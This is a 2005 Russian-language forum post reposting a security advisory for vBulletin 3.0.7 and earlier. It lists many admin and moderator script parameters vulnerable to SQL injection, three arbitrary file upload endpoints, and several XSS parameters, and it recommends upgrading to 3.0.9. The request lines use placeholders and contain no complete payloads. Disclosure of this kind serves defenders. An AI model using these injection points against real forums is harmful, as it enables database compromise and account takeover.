vBulletin SQL INJ <=3.0.7

vBulletin SQL INJ <=3.0.7
27.09.2005, 23:01
WizART
Участник форума
Регистрация: 19.07.2005
Сообщений: 292
С нами: 10953146
Репутация: 11
vBulletin SQL INJ <=3.0.7
Код:
Продукт: vBulletin
URL: http://vbulletin.com
Версия: <= vBulletin 3.0.7
Уязвимость: SQL-инъекция и загрузка произвольных файлов

SQL-Injection:

/joinrequests.php:
POST: <do=processjoinrequests&usergroupid=22&request[[SQL-Injection]]=0>
/modcp/announcement.php:
POST: <do=update&announcementid=1&start=24-07-05&end=30-07-05
&announcement[0]=[SQL-Injection]>
/modcp/thread.php:
POST: <do=dothreads&thread[forumid]=0XF>
POST: <do=dothreadssel&criteria=a:1:{s:7:"forumid";s:5:"aaaa'";}>
/modcp/user.php:
GET: <do=avatar&userid=0XF>

/admincp/admincalendar.php:
GET: <do=addcustom&calendarcustomfieldid=[SQL-Injection]>
GET: <do=addmod&calendarid=[SQL-Injection]>
GET: <do=addmod&calendarid=1&moderatorid=[SQL-Injection]>
GET: <do=deletecustom&calendarcustomfieldid=[SQL-Injection]>
POST: <do=doremoveholiday&holidayid=[SQL-Injection]>
GET: <do=edit&calendarid=[SQL-Injection]>
POST: <do=kill&calendarid=[SQL-Injection]>
POST: <do=killmod&$calendarmoderatorid=[SQL-Injection]>
GET: <do=remove&calendarid=[SQL-Injection]>
POST: <do=removemod&moderatorid=[SQL-Injection]>
POST: <do=saveholiday&holidayinfo[title]=sepro&holidayid=0XF>
POST: <do=update&calendar[daterange]=2002-2008&calendarid=0XF>
GET: <do=updateholiday&holidayid=0XF>
POST: <do=update&calendarid=1&calendar[daterange]=1970-2030&
calendar[0]=[SQL-Injection]>
POST: <do=updatemod&calendarid=1&moderatorid=[SQL-Injection]>
POST: <do=updatemod&moderatorid=1&moderator[calendarid]=[SQL-Injection]>
/admincp/cronlog.php:
POST: <do=doprunelog&cronid=0XF>
POST: <do=prunelog&cronid=0XF>
/admincp/email.php:
POST: <do=makelist&user[usergroupid][0]=[SQL-Injection]>
/admincp/help.php:
POST: <do=doedit&help[script]=1&help[0]=[SQL-Injection]>
/admincp/user.php:
GET: <do=find&orderby=username&limitnumber=[SQL-Injection]>
GET: <do=find&orderby=username&limitstart=[SQL-Injection]>
/admincp/usertitle.php:
GET: <do=edit&usertitleid=0XF>
GET: <do=pmuserstats&ids=0XF>
/admincp/language.php:
POST: <do=update&rvt[0]=[SQL-Injection]>
/admincp/phrase.php:
POST: <do=completeorphans&keep[0]=[SQL-Injection]>
/admincp/template.php:
GET: <do=editstyle&dostyleid=[SQL-Injection]>
GET: <do=editstyle&dostyleid=[SQL-Injection]>
POST: <do=revertall&dostyleid=[SQL-Injection]>
/admincp/thread.php:
POST: <do=dothreads&thread[forumid]=0XF>
/admincp/usertools.php:
POST: <do=updateprofilepic>
/admincp/vbugs_admin.php:
GET: <do=editseverity&vbug_severityid=[SQL-Injection]>
GET: <do=removeseverity&vbug_severityid=[SQL-Injection]>
GET: <do=updateseverity&vbug_severityid=[SQL-Injection]>

Загрузка произвольных файлов:

/admincp/image.php:
POST: <do=upload&table=avatar>
POST: <do=upload&table=icon>
POST: <do=upload&table=smilie>

XSS:

/modcp/index.php:
GET: <do=frames&loc=[XSS]>
/modcp/user.php:
GET: <do=gethost&ip=[XSS]>
/admincp/css.php:
GET: <do=doedit&dostyleid=1&group=[XSS]>
/admincp/index.php:
GET: <redirect=[XSS]>
GET: <do=frames&loc=[XSS]>
/admincp/user.php:
GET: <do=emailpassword&email=[XSS]>
/admincp/usertitle.php:
GET: <do=gethost&ip=[XSS]>
/admincp/language.php:
GET: <do=rebuild&goto=[XSS]>
/admincp/modlog.php:
GET: <do=view&orderby=[XSS]>
/admincp/template.php:
GET: <do=colorconverter&hex=[XSS]>
GET: <do=colorconverter&rgb=[XSS]>
GET: <do=modify&expandset=[XSS]>

Решение: обновить до версии vBulletin 3.0.9
Источник http://www.securityinfo.ru/2005/09/s...vbulletin.html
𝕏 Twitter Reddit Telegram Копировать ссылку